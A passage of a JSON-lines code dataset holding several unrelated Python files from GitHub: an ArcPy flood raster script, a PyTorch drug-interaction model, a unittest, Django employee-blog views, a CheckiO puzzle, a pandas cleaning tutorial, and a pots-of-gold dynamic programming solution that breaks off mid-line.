clip_depth = os.path.join(scratch_ws, \"clip_depth\")\n\n if arcpy.Exists(clip_depth):\n arcpy.Delete_management(clip_depth)\n\n # create raster from default depth value\n msg_body = create_msg_body(\"Create clip depth raster...\", 0, 0)\n msg(msg_body)\n\n # grab depth elevation values where not null and null where is null (clip using flooding raster)\n outConRaster = arcpy.sa.Con(is_null, input_source, depth_raster)\n outConRaster.save(clip_depth)\n\n msg_body = create_msg_body(\"Subtracting depth raster from input flooding raster.\", 0, 0)\n msg(msg_body)\n\n if use_in_memory:\n minus_raster = \"in_memory/minus_3D\"\n else:\n minus_raster = os.path.join(scratch_ws, \"minus_3D\")\n if arcpy.Exists(minus_raster):\n arcpy.Delete_management(minus_raster)\n\n # actual subtract\n arcpy.Minus_3d(input_source, clip_depth, minus_raster)\n\n # now we want just the outside cells (1x cellsize)\n if use_in_memory:\n raster_polygons = \"in_memory/raster_polygons\"\n else:\n raster_polygons = os.path.join(scratch_ws, \"raster_polygons\")\n if arcpy.Exists(raster_polygons):\n arcpy.Delete_management(raster_polygons)\n\n out_geom = \"POLYGON\" # output geometry type\n arcpy.RasterDomain_3d(minus_raster, raster_polygons, out_geom)\n\n # buffer it outwards first\n if use_in_memory:\n polygons_outward = \"in_memory/outward_buffer\"\n else:\n polygons_outward = os.path.join(scratch_ws, \"outward_buffer\")\n if arcpy.Exists(polygons_outward):\n arcpy.Delete_management(polygons_outward)\n\n # x = cell_size_source.getOutput(0)\n x = float(re.sub(\"[,.]\", \".\", str(cell_size_source.getOutput(0))))\n# x = float(str(cell_size_source.getOutput(0)))\n buffer_out = int(x)\n\n xy_unit = common_lib.get_xy_unit(minus_raster, 0)\n\n if xy_unit == \"Feet\":\n buffer_text = str(buffer_out) + \" Feet\"\n else:\n buffer_text = str(buffer_out) + \" Meters\"\n\n sideType = \"FULL\"\n arcpy.Buffer_analysis(raster_polygons, polygons_outward, buffer_text, sideType)\n\n # buffer it inwards so that we have a polygon only of the perimeter plus a 2 cells inward.\n if 
use_in_memory:\n polygons_inward = \"in_memory/inward_buffer\"\n else:\n polygons_inward = os.path.join(scratch_ws, \"inward_buffer\")\n if arcpy.Exists(polygons_inward):\n arcpy.Delete_management(polygons_inward)\n\n # x = cell_size_source.getOutput(0)\n x = float(re.sub(\"[,.]\", \".\", str(cell_size_source.getOutput(0))))\n# x = float(str(cell_size_source.getOutput(0)))\n\n buffer_in = (boundary_size-1) + int(2*x) # boundary is always 2 cellsizes / user can't go lower than 2.\n\n xy_unit = common_lib.get_xy_unit(minus_raster, 0)\n\n if xy_unit == \"Feet\":\n buffer_text = \"-\" + str(buffer_in) + \" Feet\"\n else:\n buffer_text = \"-\" + str(buffer_in) + \" Meters\"\n\n sideType = \"FULL\"\n arcpy.Buffer_analysis(polygons_outward, polygons_inward, buffer_text, sideType)\n\n if use_in_memory:\n erase_polygons = \"in_memory/erase\"\n else:\n erase_polygons = os.path.join(scratch_ws, \"erase\")\n if arcpy.Exists(erase_polygons):\n arcpy.Delete_management(erase_polygons)\n\n xyTol = \"1 Meters\"\n arcpy.Erase_analysis(polygons_outward, polygons_inward, erase_polygons)\n\n msg_body = create_msg_body(\"Buffering depth edges...\", 0, 0)\n msg(msg_body)\n\n if use_in_memory:\n extract_mask_raster = \"in_memory/extract_mask\"\n else:\n extract_mask_raster = os.path.join(scratch_ws, \"extract_mask\")\n if arcpy.Exists(extract_mask_raster):\n arcpy.Delete_management(extract_mask_raster)\n\n extract_temp_raster = arcpy.sa.ExtractByMask(minus_raster, erase_polygons)\n extract_temp_raster.save(extract_mask_raster)\n\n if no_initial_depth_raster == True:\n if use_in_memory:\n plus_mask = \"in_memory/plus_mask\"\n else:\n plus_mask = os.path.join(scratch_ws, \"plus_mask\")\n if arcpy.Exists(plus_mask):\n arcpy.Delete_management(plus_mask)\n\n arcpy.Plus_3d(extract_mask_raster, (depth_value - 1), plus_mask)\n extract_mask_raster = plus_mask\n\n if use_in_memory:\n minus_raster2 = \"in_memory/minus_3D2\"\n else:\n minus_raster2 = os.path.join(scratch_ws, \"minus_3D2\")\n if arcpy.Exists(minus_raster2):\n arcpy.Delete_management(minus_raster2)\n\n # push depth elevation raster down by default depth value\n if depth_value > 0 and no_initial_depth_raster == False:\n msg_body = create_msg_body(\"Pushing inner depth down by: \" + str(depth_value) + \" to prevent z-fighting.\", 0, 0)\n msg(msg_body)\n arcpy.Minus_3d(minus_raster, depth_value, minus_raster2)\n else:\n minus_raster2 = minus_raster\n\n if 0: #use_in_memory:\n mosaic_raster = \"in_memory/mosaic\"\n else:\n mosaic_raster = os.path.join(scratch_ws, \"mosaic\")\n if arcpy.Exists(mosaic_raster):\n arcpy.Delete_management(mosaic_raster)\n\n listRasters = []\n listRasters.append(extract_mask_raster)\n listRasters.append(minus_raster2)\n\n desc = arcpy.Describe(listRasters[0])\n\n # grab the original outside cells and the pushed down depth elevation raster\n arcpy.MosaicToNewRaster_management(listRasters, os.path.dirname(mosaic_raster), os.path.basename(mosaic_raster),\n desc.spatialReference,\n \"32_BIT_FLOAT\", x, 1, \"FIRST\", \"\")\n\n # now we do an isnull on raster domain poly\n assignmentType = \"CELL_CENTER\"\n priorityField = \"#\"\n\n # Execute PolygonToRaster\n calc_field = \"value_field\"\n common_lib.delete_add_field(raster_polygons, calc_field, \"DOUBLE\")\n arcpy.CalculateField_management(raster_polygons, calc_field, 1, \"PYTHON_9.3\")\n\n if use_in_memory:\n poly_raster = \"in_memory/poly_raster\"\n else:\n poly_raster = os.path.join(scratch_ws, \"poly_raster\")\n if arcpy.Exists(poly_raster):\n arcpy.Delete_management(poly_raster)\n\n 
arcpy.PolygonToRaster_conversion(raster_polygons, calc_field, poly_raster, assignmentType, priorityField, x)\n\n # create isnull\n if use_in_memory:\n is_null2 = \"in_memory/isnull_copy2\"\n else:\n is_null2 = os.path.join(scratch_ws, \"isnull_copy2\")\n\n if arcpy.Exists(is_null2):\n arcpy.Delete_management(is_null2)\n\n is_Null_raster2 = arcpy.sa.IsNull(poly_raster)\n is_Null_raster2.save(is_null2)\n\n # con on mosaic\n finalRaster = arcpy.sa.Con(is_null2, poly_raster, mosaic_raster)\n finalRaster.save(output_raster)\n else:\n arcpy.AddWarning(\n \"Cell size of \" + common_lib.get_name_from_feature_class(input_source) + \" is different than \" + org_depth_raster + \". Exiting...\")\n\n output_raster = None\n\n if use_in_memory:\n arcpy.Delete_management(\"in_memory\")\n\n else: # use default depth value\n raise NoInputLayer\n\n end_time = time.clock()\n msg_body = create_msg_body(\"Set Flood Elevation Value for Raster completed successfully.\", start_time, end_time)\n msg(msg_body)\n\n arcpy.ClearWorkspaceCache_management()\n\n return output_raster\n else:\n raise LicenseErrorSpatial\n else:\n raise LicenseError3D\n\n arcpy.ClearWorkspaceCache_management()\n\n\n except MixOfSR:\n # The input has mixed SR\n #\n print(('Input data has mixed spatial references. Ensure all input is in the same spatial reference, including the same vertical units.'))\n arcpy.AddError('Input data has mixed spatial references. Ensure all input is in the same spatial reference, including the same vertical units.')\n\n except NoInputLayer:\n print(\"Can't find Input layer. Exiting...\")\n arcpy.AddError(\"Can't find Input layer. Exiting...\")\n\n except NoDepthRaster:\n print(\"Can't find Depth raster. Exiting...\")\n arcpy.AddError(\"Can't find depth raster. Exiting...\")\n\n except NotProjected:\n print(\"Input data needs to be in a projected coordinate system. Exiting...\")\n arcpy.AddError(\"Input data needs to be in a projected coordinate system. Exiting...\")\n\n except NoLayerFile:\n print(\"Can't find Layer file. Exiting...\")\n arcpy.AddError(\"Can't find Layer file. 
Exiting...\")\n\n except LicenseError3D:\n print(\"3D Analyst license is unavailable\")\n arcpy.AddError(\"3D Analyst license is unavailable\")\n\n except LicenseErrorSpatial:\n print(\"Spatial Analyst license is unavailable\")\n arcpy.AddError(\"Spatial Analyst license is unavailable\")\n\n except NoNoDataError:\n print(\"Input raster does not have NODATA values\")\n arcpy.AddError(\"Input raster does not have NODATA values\")\n\n except NoUnits:\n print(\"No units detected on input data\")\n arcpy.AddError(\"No units detected on input data\")\n\n except NoPolygons:\n print(\"Input data can only be polygon features or raster datasets.\")\n arcpy.AddError(\"Input data can only be polygon features or raster datasets.\")\n\n except ValueError:\n print(\"Input no flood value is not a number.\")\n arcpy.AddError(\"Input no flood value is not a number.\")\n\n except arcpy.ExecuteError:\n line, filename, synerror = trace()\n msg(\"Error on %s\" % line, ERROR)\n msg(\"Error in file name: %s\" % filename, ERROR)\n msg(\"With error message: %s\" % synerror, ERROR)\n msg(\"ArcPy Error Message: %s\" % arcpy.GetMessages(2), ERROR)\n\n except FunctionError as f_e:\n messages = f_e.args[0]\n msg(\"Error in function: %s\" % messages[\"function\"], ERROR)\n msg(\"Error on %s\" % messages[\"line\"], ERROR)\n msg(\"Error in file name: %s\" % messages[\"filename\"], ERROR)\n msg(\"With error message: %s\" % messages[\"synerror\"], ERROR)\n msg(\"ArcPy Error Message: %s\" % messages[\"arc\"], ERROR)\n\n except:\n line, filename, synerror = trace()\n msg(\"Error on %s\" % line, ERROR)\n msg(\"Error in file name: %s\" % filename, ERROR)\n msg(\"with error message: %s\" % synerror, ERROR)\n\n finally:\n arcpy.CheckInExtension(\"3D\")\n arcpy.CheckInExtension(\"Spatial\")\n\n\n# for debug only!\nif __name__ == \"__main__\":\n create_raster(\"\", \"\", \"\", \"\", 1)","repo_name":"gvanmaren/3D-Flood-Impact","sub_path":"Toolboxes/scripts/create_depth_raster.py","file_name":"create_depth_raster.py","file_ext":"py","file_size_in_byte":25460,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"70"}
+{"seq_id":"32521273360","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom gnn_encoder import encoder\r\n\r\nclass complex_fuse_base(nn.Module):\r\n def __init__(self, drug_node_num, protein_node_num, fp_dim,\r\n h_dim, out_dim, num_base, target_num, dropout,\r\n num_rela, ablation, drug_mark, o_fun, classifier='cip'):\r\n super(complex_fuse_base, self).__init__()\r\n self.cmlp = ablation['cmlp']\r\n self.drug_mark = drug_mark\r\n self.encoder = encoder(drug_node_num, protein_node_num, fp_dim,\r\n h_dim, out_dim, num_base, target_num, dropout,\r\n drug_mark=self.drug_mark)\r\n self.fp_fc_layer = nn.Linear(h_dim, out_dim, bias=False)\r\n self.skip_fc_layer = nn.Linear(h_dim, out_dim, bias=False)\r\n\r\n self.layer_norm_weight = nn.LayerNorm(out_dim, elementwise_affine=False)\r\n self.layer_norm_weight_hdim = nn.LayerNorm(h_dim, elementwise_affine=False)\r\n\r\n self.ablation = ablation\r\n\r\n if self.cmlp:\r\n\r\n self.rela_linear_r1 = nn.Parameter(torch.Tensor(out_dim, out_dim))\r\n self.rela_linear_r2 = nn.Parameter(torch.Tensor(out_dim, out_dim))\r\n self.rela_linear_i1 = nn.Parameter(torch.Tensor(out_dim, out_dim))\r\n self.rela_linear_i2 = nn.Parameter(torch.Tensor(out_dim, out_dim))\r\n nn.init.xavier_uniform_(self.rela_linear_r1,\r\n gain=nn.init.calculate_gain('relu'))\r\n nn.init.xavier_uniform_(self.rela_linear_r2,\r\n gain=nn.init.calculate_gain('relu'))\r\n nn.init.xavier_uniform_(self.rela_linear_i1,\r\n gain=nn.init.calculate_gain('relu'))\r\n nn.init.xavier_uniform_(self.rela_linear_i2,\r\n gain=nn.init.calculate_gain('relu'))\r\n\r\n self.classifier = classifier\r\n self.o_fun = o_fun\r\n if classifier == 'mlp':\r\n self.w_relation = nn.Parameter(torch.Tensor(num_rela, 2 * out_dim)) # C,F\r\n nn.init.xavier_uniform_(self.w_relation,\r\n gain=nn.init.calculate_gain('sigmoid'))\r\n if classifier == 'cip':\r\n self.w_relationR = nn.Parameter(torch.Tensor(num_rela, out_dim))\r\n self.w_relationI = nn.Parameter(torch.Tensor(num_rela, out_dim))\r\n nn.init.xavier_uniform_(self.w_relationR,\r\n gain=nn.init.calculate_gain('sigmoid'))\r\n nn.init.xavier_uniform_(self.w_relationI,\r\n gain=nn.init.calculate_gain('sigmoid'))\r\n\r\n if ablation['method'] == 'quate':\r\n self.w_relation = nn.Parameter(torch.Tensor(num_rela, 4 * out_dim)) # C,F\r\n nn.init.xavier_uniform_(self.w_relation,\r\n gain=nn.init.calculate_gain('sigmoid'))\r\n\r\n self.b_relation = nn.Parameter(torch.zeros(num_rela), requires_grad=True)\r\n\r\n def forward(self,\r\n fp,\r\n drug_node_id,\r\n kg_node_id,\r\n adj_list, # [d-d, d-t, p-p]\r\n idx1,\r\n idx2,\r\n idx3):\r\n drug_fp, drug_init, x1, x2 = self.encoder(fp, drug_node_id, kg_node_id, adj_list)\r\n\r\n drug_fp = F.elu(self.layer_norm_weight_hdim(drug_fp))\r\n x_fp = F.elu(self.fp_fc_layer(drug_fp))\r\n x_drug_skip = self.skip_fc_layer(drug_init)\r\n if self.ablation['method'] == 'ASC':\r\n R1 = x1[idx1] + x_fp[idx2]\r\n Ima1 = x2[idx1] + x_drug_skip[idx2]\r\n R2 = x_drug_skip[idx1] + x2[idx2]\r\n Ima2 = x_fp[idx1] + x1[idx2]\r\n\r\n if self.cmlp:\r\n R1, Ima1 = self.complex_nn(R1, Ima1,\r\n self.rela_linear_r1, self.rela_linear_i1)\r\n R2, Ima2 = self.complex_nn(R2, Ima2,\r\n self.rela_linear_r2, self.rela_linear_i2)\r\n\r\n R1 = self.layer_norm_weight(R1)\r\n Ima1 = self.layer_norm_weight(Ima1)\r\n R2 = self.layer_norm_weight(R2)\r\n Ima2 = self.layer_norm_weight(Ima2)\r\n\r\n R, Ima = self.complex_mult(R1, Ima1, R2, Ima2)\r\n\r\n R = self.layer_norm_weight(R)\r\n Ima = self.layer_norm_weight(Ima)\r\n\r\n if 
self.classifier == 'mlp':\r\n lr = torch.cat((R, Ima), dim=1)\r\n output = torch.sigmoid(torch.sum(lr * self.w_relation[idx3], dim=1).reshape(-1) + \\\r\n self.b_relation[idx3])\r\n if self.classifier == 'cip':\r\n r_, i_ = self.complex_inner(R, Ima, self.w_relationR[idx3], self.w_relationI[idx3])\r\n if self.o_fun == 'SUM':\r\n output = torch.sigmoid(r_ + i_)\r\n if self.o_fun == 'RE':\r\n output = torch.sigmoid(r_)\r\n\r\n if self.ablation['method'] == 'SC':\r\n x1_intra = x1 + x_fp\r\n x2_intra = x2 + x_drug_skip\r\n R1 = x1_intra[idx1] # h\r\n Ima1 = x2_intra[idx1] # h\r\n R2 = x2_intra[idx2] # t\r\n Ima2 = x1_intra[idx2] # t\r\n R1 = self.layer_norm_weight(R1)\r\n Ima1 = self.layer_norm_weight(Ima1)\r\n R2 = self.layer_norm_weight(R2)\r\n Ima2 = self.layer_norm_weight(Ima2)\r\n\r\n R, Ima = self.complex_mult(R1, Ima1, R2, Ima2)\r\n\r\n R = self.layer_norm_weight(R)\r\n Ima = self.layer_norm_weight(Ima)\r\n\r\n if self.classifier == 'mlp':\r\n lr = torch.cat((R, Ima), dim=1)\r\n output = torch.sigmoid(torch.sum(lr * self.w_relation[idx3], dim=1).reshape(-1) + \\\r\n self.b_relation[idx3])\r\n if self.classifier == 'cip':\r\n r_, i_ = self.complex_inner(R, Ima, self.w_relationR[idx3], self.w_relationI[idx3])\r\n if self.o_fun == 'SUM':\r\n output = torch.sigmoid(r_ + i_)\r\n if self.o_fun == 'RE':\r\n output = torch.sigmoid(r_)\r\n\r\n elif self.method == 'quate':\r\n x1 = self.layer_norm_weight(x1)\r\n x2 = self.layer_norm_weight(x2)\r\n x_fp = self.layer_norm_weight(x_fp)\r\n x_drug_skip = self.layer_norm_weight(x_drug_skip)\r\n a, b, c, d = x1[idx1], x2[idx1], x_fp[idx1], x_drug_skip[idx1]\r\n p, q, u, v = x1[idx2], x2[idx2], x_fp[idx2], x_drug_skip[idx2]\r\n R = a * p - b * q - c * u - d * v\r\n Ima1 = a * q + b * p + c * v - d * u\r\n Ima2 = a * u - b * v + c * p + d * q\r\n Ima3 = a * v + b * u - c * q + d * p\r\n lr = torch.cat((R, Ima1, Ima2, Ima3), dim=1)\r\n output = torch.sigmoid(torch.sum(lr * self.w_relation[idx3], dim=1).reshape(-1) + \\\r\n self.b_relation[idx3])\r\n\r\n return output\r\n\r\n def complex_mult(self, R1, Ima1, R2, Ima2):\r\n R = R1 * R2 - Ima1 * Ima2\r\n Ima = R1 * Ima2 + Ima1 * R2\r\n return R, Ima\r\n\r\n def complex_nn(self, R, Ima, W_R, W_I):\r\n r_trans = torch.mm(R, W_R) - torch.mm(Ima, W_I)\r\n i_trans = torch.mm(R, W_I) + torch.mm(Ima, W_R)\r\n r_trans = F.relu(r_trans)\r\n i_trans = F.relu(i_trans)\r\n return r_trans, i_trans\r\n\r\n def complex_inner(self, R, Ima, w_r, w_i):\r\n r_ = torch.sum(R * w_r, dim=1) - torch.sum(Ima * (-1) * w_i, dim=1)\r\n i_ = torch.sum(R * (-1) * w_i, dim=1) + torch.sum(Ima * w_r, dim=1)\r\n return r_, i_","repo_name":"zhanglabNKU/DMCF-DDI","sub_path":"DMCF_DDI.py","file_name":"DMCF_DDI.py","file_ext":"py","file_size_in_byte":7624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"36641401013","text":"import unittest\nimport unittest.mock as mock\n\nimport filters.allbatchfilter as allbatchfilter\n\n\nclass AllBatchFilterTests(unittest.TestCase):\n def test_constructor_succeeds(self):\n allbatchfilter.AllBatchFilter(mock.Mock())\n\n def test_filter_items_calls_filter_items_on_subfilters(self):\n items = [mock.Mock(), mock.Mock(), mock.Mock()]\n result_items = [mock.Mock(), mock.Mock()]\n\n filter1 = self._create_filter(True)\n filter1.filter_items = mock.MagicMock(items)\n filter2 = self._create_filter(True)\n filter2.filter_items = mock.MagicMock(return_value=result_items)\n\n batch_filter = allbatchfilter.AllBatchFilter(mock.Mock())\n batch_filter.add_filter(filter1)\n batch_filter.add_filter(filter2)\n\n results = batch_filter.filter_items(items)\n self.assertEqual(result_items, results)\n\n filter1.filter_items.assert_called()\n filter2.filter_items.assert_called()\n\n def test_is_match_does_not_return_item_if_no_subfilters_return_true(self):\n self._execute_is_match_test(False, [False, False, False])\n\n def test_is_match_does_not_return_item_if_only_some_subfilters_return_true(self):\n self._execute_is_match_test(False, [False, True, False])\n\n def test_is_match_returns_item_if_all_filters_return_true(self):\n self._execute_is_match_test(True, [True, True, True])\n\n def _execute_is_match_test(self, expected_result, filter_results):\n batch_filter = allbatchfilter.AllBatchFilter(mock.Mock())\n for filter_result in filter_results:\n batch_filter.add_filter(self._create_filter(filter_result))\n self.assertEqual(expected_result, batch_filter.is_match(mock.Mock()))\n\n def _create_filter(self, return_value):\n mock_filter = mock.Mock()\n mock_filter.is_match = mock.MagicMock(return_value=return_value)\n return mock_filter\n","repo_name":"kemmot/PyTasks","sub_path":"tasks/tests/allbatchfilter_test.py","file_name":"allbatchfilter_test.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"73407726306","text":"from multiprocessing import context\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom Empleados.forms import EquipoFormulario, LiderFormulario, RegistroFormulario, AvatarFormulario\nfrom Empleados.models import Equipo, Lider, Colaborador, Post, Avatar\nfrom django.views.generic import ListView\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.forms import AuthenticationForm, UserCreationForm\nfrom django.contrib.auth import login, authenticate\n\n\n\ndef register(request):\n\n if request.method == 'POST': \n\n form = RegistroFormulario(request.POST) \n\n if form.is_valid():\n\n user=form.cleaned_data['username']\n form.save()\n \n return render(request, \"Empleados/inicio.html\", {'mensaje':\"Usuario Creado\"})\n \n else:\n\n form = RegistroFormulario() \n \n \n return render(request, \"Empleados/registro.html\", {'form':form})\n\n\n\n\ndef login_request(request):\n\n if request.method == 'POST': \n\n form = AuthenticationForm(request, data = request.POST) \n\n if form.is_valid():\n \n usuario=form.cleaned_data.get('username') \n contra=form.cleaned_data.get('password') \n\n user=authenticate(username=usuario, password=contra) \n\n if user: \n\n login(request, user) \n\n \n return render(request, \"Empleados/inicio.html\", {'mensaje':f\"Bienvenido {user}\"}) \n\n else: \n return render(request, \"Empleados/inicio.html\", {'mensaje':\"Error. Datos incorrectos\"})\n\n else:\n \n form = AuthenticationForm() \n\n \n return render(request, \"/Empleados/login.html\", {'form':form}) \n\n\n\n@login_required\ndef inicio(request):\n\n\n return render(request,\"Empleados/inicio.html\")\n\n@login_required\ndef agregarImagen(request):\n\n if request.method == 'POST': \n\n miFormulario = AvatarFormulario(request.POST, request.FILES) \n\n if miFormulario.is_valid():\n\n informacion = miFormulario.cleaned_data\n\n avatar = Avatar(user=request.user, imagen=informacion['imagen'])\n\n avatar.save()\n\n return render(request, \"Empleados/inicio.html\")\n\n else:\n\n miFormulario = AvatarFormulario()\n \n return render(request, \"Empleados/agregarImg.html\", {'form':miFormulario})\n\n@login_required\ndef agregarEquipo(request):\n\n \n if request.method == 'POST': \n\n miFormulario = EquipoFormulario(request.POST) \n\n print(miFormulario)\n\n if miFormulario.is_valid(): \n\n informacion = miFormulario.cleaned_data\n\n equipo = Equipo(nombre=informacion['nombre'], equipo=informacion['equipo'], conformacion=informacion['conformacion']) \n\n equipo.save()\n\n return render(request, \"Empleados/inicio.html\") \n\n else:\n\n miFormulario = EquipoFormulario() \n\n dict1={\"miFormulario\":miFormulario}\n\n return render(request, \"Empleados/Equipo.html\", dict1)\n\n@login_required\ndef agregarColaborador(request):\n\n return render(request, \"Empleado/colaborador.html\")\n\n@login_required\ndef agregarPosteo(request):\n\n return render(request, \"Empleado/posteo.html\")\n\n\n\n@login_required\ndef agregarLider(request):\n\n\n if request.method == 'POST': \n\n miFormulario = LiderFormulario(request.POST)\n\n if miFormulario.is_valid():\n\n info = miFormulario.cleaned_data \n lider = Lider(nombre=info['nombre'], apellido=info['apellido'],\n email=info['email'],area=info['Area'])\n\n lider.save()\n\n return render(request, 
\"Empleados/inicio.html\")\n\n else:\n\n miFormulario = LiderFormulario()\n\n dict1={'myForm':miFormulario}\n\n return render(request,\"Empleados/lider.html\", dict1)\n\n\n\n@login_required\ndef busquedaEquipo(request):\n\n return render(request, \"Empleados/busquedaEquipo.html\")\n\n\n\n@login_required\ndef buscar(request):\n\n\n if request.GET['equipo']:\n\n equipo = request.GET['equipo'] \n equipos = Equipo.objects.filter(equipo__iexact=equipo)\n\n return render(request, \"Empleados/resultadosBusqueda.html\", {\"equipos\":equipos, \"equipo\":equipo})\n\n else:\n\n respuesta=\"No detectamos el envio de la data\"\n \n return HttpResponse(respuesta)\n\n\n@login_required\ndef borrarLideres(request, lider_nombre):\n\n lider = Lider.objects.get(nombre=lider_nombre)\n \n lider.delete()\n \n lideres = Lider.objects.all()\n\n contexto={\"lideres\":lideres}\n\n return render(request, \"Empleados/liederes_list.html\",contexto)\n\n@login_required\ndef editarLideres(request, lider_nombre):\n\n lider = Lider.objects.get(nombre=lider_nombre)\n\n if request.method == \"POST\":\n\n miFormulario = LiderFormulario(request.POST)\n\n if miFormulario.is_valid():\n\n informacion = miFormulario.cleaned_data\n\n lider.nombre = informacion['nombre']\n lider.apellido = informacion['apellido']\n lider.email = informacion['email']\n lider.area = informacion['area']\n\n lider.save()\n\n return render(request, \"Empleados/inicio.html\")\n\n else:\n\n miFormulario= LiderFormulario(initial={'nombre':lider.nombre, 'apellido':lider.apellido,\n 'email':lider.email, 'area':lider.area})\n\n return render(request, \"Empleado/lider_Editar.html\",{'miFormulario':miFormulario, 'lider_nombre':lider_nombre})\n\n@login_required\ndef editarUsuario(request):\n\n usuario = request.user \n\n if request.method == \"POST\": \n\n miFormulario = RegistroFormulario(request.POST) \n\n if miFormulario.is_valid():\n\n informacion = miFormulario.cleaned_data \n\n usuario.username = informacion['username']\n usuario.email = informacion['email']\n usuario.password1 = informacion['password1']\n usuario.password2 = informacion['password1']\n usuario.save()\n\n return render(request, \"Empleado/inicio.html\")\n\n else:\n\n miFormulario= RegistroFormulario(initial={'username':usuario.username, 'email':usuario.email})\n\n return render(request, \"Empleado/editarUsuario.html\",{'miFormulario':miFormulario, 'usuario':usuario.username})\n\n\n\n\n@login_required\n\ndef listaLideres(request):\n\n lideres = Lider.objects.all() \n\n\n contexto = {\"lideres\":lideres}\n return render(request, \"Empleado/leerLideres.html\",contexto)\n\n\n\n\nclass EquipoList(LoginRequiredMixin, ListView):\n\n model = Equipo\n template_name = \"Empleado/listaEquipos.html\"\n\nclass EquipoDetalle(DetailView):\n\n model = Equipo\n template_name = \"Empleado/equipoDetalle.html\"\n\nclass EquipoCreacion(CreateView):\n\n model = Equipo\n success_url = \"/Empleado/equipo/lista\"\n fields = ['nombre', 'equipo', 'duracion']\n\nclass EquipoUpdate(UpdateView):\n\n model = Equipo\n success_url = \"/Empleado/equipo/lista\"\n fields = ['nombre', 'equipo', 'duracion']\n\n\nclass EquipoDelete(DeleteView):\n\n model = Equipo\n success_url = \"/Empleado/equipo/lista\"\n\n\nclass ColaboradorList(LoginRequiredMixin, ListView):\n\n model = Colaborador\n template_name = 
\"Empleado/listaColaborador.html\"","repo_name":"AbigailLiempe/EquipoBlog","sub_path":"Empleados/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7368,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"35562025154","text":"from typing import Iterable\n\n\ndef can_balance(weights: Iterable) -> int:\n\n def is_balanced(_indx):\n data = [[reversed(weights[:_indx]), 0], [weights[_indx+1:], 0]]\n for lst in data:\n for _i, val in enumerate(lst[0]):\n lst[1] += val * (_i + 1)\n return data[0][1] == data[1][1]\n\n if len(weights) == 1:\n return 0\n size = len(weights) // 2\n\n for i in range(size):\n tmp = [is_balanced(size - i), is_balanced(size + i)]\n if any(tmp):\n return size - i if tmp[0] else size + i\n return -1\n\n\nif __name__ == '__main__':\n print(\"Example:\")\n print(can_balance([6, 1, 10, 5, 4]))\n\n # These \"asserts\" are used for self-checking and not for an auto-testing\n assert can_balance([6, 1, 10, 5, 4]) == 2\n assert can_balance([10, 3, 3, 2, 1]) == 1\n assert can_balance([7, 3, 4, 2, 9, 7, 4]) == -1\n assert can_balance([42]) == 0\n print(\"Coding complete? Click 'Check' to earn cool rewards!\")\n","repo_name":"olegJF/Checkio","sub_path":"Can_Balance.py","file_name":"Can_Balance.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"39661913332","text":"# Import pandas\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# Read the file into a DataFrame: df\ndf = pd.read_csv('DataSets/dob_job_application_filings_subset.csv')\n\n# Print the shape of df\nprint(df.shape)\n\n# Print the columns of df\nprint(df.columns)\n\ndf_subset = df[['Job #', 'Doc #', 'Borough', 'Initial Cost', 'Total Est. Fee',\n 'Existing Zoning Sqft', 'Proposed Zoning Sqft', 'Enlargement SQ Footage', 'Street Frontage',\n 'ExistingNo. of Stories', 'Proposed No. of Stories', 'Existing Height', 'Proposed Height']]\n# # Print the head and tail of df_subset\nprint(df_subset.head())\nprint(df_subset.tail())\n\n# Print the info of df_subset\nprint(df_subset.info())\n\nprint(df_subset.describe())\n\n# # FIND THE OUTLIERS\n#\n# Plot the histogram\ndf['Existing Zoning Sqft'].plot(kind='hist', rot=70, logx=True, logy=True)\n# Display the histogram\nplt.show()\n\nprint(df[['Initial Cost']].head())\ndf[\"initial_cost\"] = df[\"Initial Cost\"].apply(lambda x: float(x[1:]) if x else None)\nprint(df[['initial_cost']].head())\nprint(df['initial_cost'].value_counts(dropna=False))\n\n# Create the boxplot\ndf.boxplot(column='initial_cost', by='Borough', rot=90)\n# Display the plot\nplt.show()\n\n# Create and display the first scatter plot\ndf.plot(kind='scatter', x='initial_cost', y='total_est_fee', rot=70)\nplt.show()\n# Create and display the second scatter plot\ndf_subset.plot(kind='scatter', x='initial_cost', y='total_est_fee', rot=70)\nplt.show()\n","repo_name":"grommy/data_science_tutorial","sub_path":"beginner/cleaning_data/step_1.py","file_name":"step_1.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"43034968808","text":"# Link: https://www.techiedelight.com/pots-gold-game-dynamic-programming/\n# Function to maximize the number of coins collected by a player,\n# assuming that opponent also plays optimally\ndef optimalStrategy(coin, i, j, lookup):\n \n # base case: one pot left, only one choice possible\n if i == j:\n return coin[i]\n \n # if we're left with only two pots, choose one with maximum coins\n if i + 1 == j:\n return max(coin[i], coin[j])\n \n # if sub-problem is seen for the first time, solve it and\n # store its result in a lookup table\n if lookup[i][j] == 0:\n # if player chooses front coin i, opponent is left to choose\n # from [i+1, j].\n # 1. if opponent chooses front coin i+1, recur for [i+2, j]\n # 2. if opponent chooses rear coin j, recur for [i+1, j-1]\n \n start = coin[i] + min(optimalStrategy(coin, i + 2, j, lookup),\n optimalStrategy(coin, i + 1, j - 1, lookup))\n \n # if player chooses rear coin j, opponent is left to choose\n # from [i, j-1].\n # 1. if opponent chooses front coin i, recur for [i+1, j-1]\n # 2. if opponent chooses rear coin j-1, recur for [i, j-2]\n \n end = coin[j] + min(optimalStrategy(coin, i + 1, j - 1, lookup),\n optimalStrategy(coin, i, j - 2, lookup))\n \n # assign maximum of two choices\n lookup[i][j] = max(start, end)\n \n # return the subproblem solution from the dict\n return lookup[i][j]\n \n \nif __name__ == '__main__':\n \n # pots of gold arranged in a line\n coin = [4, 